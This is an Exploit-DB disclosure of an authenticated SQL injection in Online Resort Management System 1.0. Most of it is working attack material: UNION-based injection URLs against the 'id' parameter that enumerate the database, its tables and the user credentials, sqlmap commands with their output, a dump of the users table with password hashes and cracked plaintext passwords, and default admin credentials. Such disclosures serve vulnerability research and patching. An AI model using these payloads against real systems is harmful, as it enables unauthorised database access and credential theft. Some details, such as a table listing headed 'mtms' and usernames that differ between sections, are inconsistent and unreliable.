Online Resort Management System 1.0 - SQLi (Authenticated)

EDB-ID:

50666

CVE:

N/A




Platform:

PHP

Date:

2022-01-18


# Exploit Title: Online Resort Management System 1.0 - SQLi (Authenticated)
# Date: 15/01/2022
# Exploit Author: Gaurav Grover
# Vendor Homepage: <http://192.168.0.108/orms/admin/login.php>
# Software Link: <https://www.sourcecodester.com/php/15126/online-resort-management-system-using-phpoop-free-source-code.html>
# Version: 1.0
# Tested on: Linux and windows both

Summary:

There are a vulnerabilities in Online Resort Management System (ORMS)
1. The attacker can easily retrieved the database using sql injection.

Proof of concepts :


Database dump Manualy using SQL Injection, SQL Query & Users detaile are mentioned below:

1. After login with the admin credentials(Username : admin / Password : admin123) there is a vulnerable parameter name is id=


2. Found SQL Injection Parameter :- http://192.168.0.108/orms/admin/?page=rooms/view_room&id=2%27order%20by%2010--+


3. http://192.168.0.108/orms/admin/?page=rooms/view_room&id=-2%27union%20select%201,2,3,4,5,6,7,8,9,10--+


4. (Database Name :- orms_db)

    Query:- http://192.168.0.108/orms/admin/?page=rooms/view_room&id=-2%27union%20select%201,database(),3,4,5,6,7,8,9,10--+


5. (Table Name :- activity_list,message_list,reservation_list,room_list,system_info,users

    Query:- http://192.168.0.108/orms/admin/?page=rooms/view_room&id=-2%27union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()),3,4,5,6,7,8,9,10--+


6. (Username Password :-  User-1 admin / 0192023a7bbd73250516f069df18b500 , User-2 cblake / 1cd74fae0a3adf459f73bbf187607ccea

    Query:- http://192.168.0.108/orms/admin/?page=rooms/view_room&id=-2%27union%20select%201,(select%20group_concat(username,password)%20from%20users),3,4,5,6,7,8,9,10--+


-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Database dump Automated using Sqlmap Tool, SQL Query & Users detaile are mentioned below:



1. Database Name:- sqlmap.py -u "http://192.168.0.108/orms/admin/?page=rooms/view_room&id=2" --batch -dbs

available databases [8]:

[*] clinic_db
[*] information_schema
[*] mtms_db
[*] mysql
[*] orms_db
[*] performance_schema
[*] phpmyadmin
[*] test


2- Dump the tables using this SQL Query:- sqlmap.py -u "http://192.168.0.108/orms/admin/?page=rooms/view_room&id=2" --batch -D orms_db --tables

Database: mtms
[6 tables]
+------------------+
| activity_list    |
| message_list     |
| reservation_list |
| room_list        |
| system_info      |
| users            |
+------------------+



3- Dump the database using this SQL Query:- sqlmap.py -u "http://192.168.0.108/orms/admin/?page=rooms/view_room&id=2" --batch -D orms_db -T users --dump

Database: orms_db
Table: users
[2 entries]
+----+------+--------+-----------------------------------+----------+----------+---------------------------------------------+--------------+------------+------------+---------------------+---------------------+
| id | type | status | avatar                            | username | lastname | password                                    | firstname    | middlename | last_login | date_added          | date_updated        |
+----+------+--------+-----------------------------------+----------+----------+---------------------------------------------+--------------+------------+------------+---------------------+---------------------+
| 1  | 1    | 1      | uploads/avatar-1.png?v=1639468007 | admin    | Admin    | 0192023a7bbd73250516f069df18b500 (admin123) | Adminstrator | NULL       | NULL       | 2021-01-20 14:02:37 | 2021-12-14 15:47:08 |
| 5  | 2    | 1      | uploads/avatar-5.png?v=1641622906 | cblake1  | Blake    | cd74fae0a3adf459f73bbf187607ccea (cblake)   | Claire       | NULL       | NULL       | 2022-01-08 14:21:46 | 2022-01-15 14:01:28 |
+----+------+--------+-----------------------------------+----------+----------+---------------------------------------------+--------------+------------+------------+---------------------+---------------------+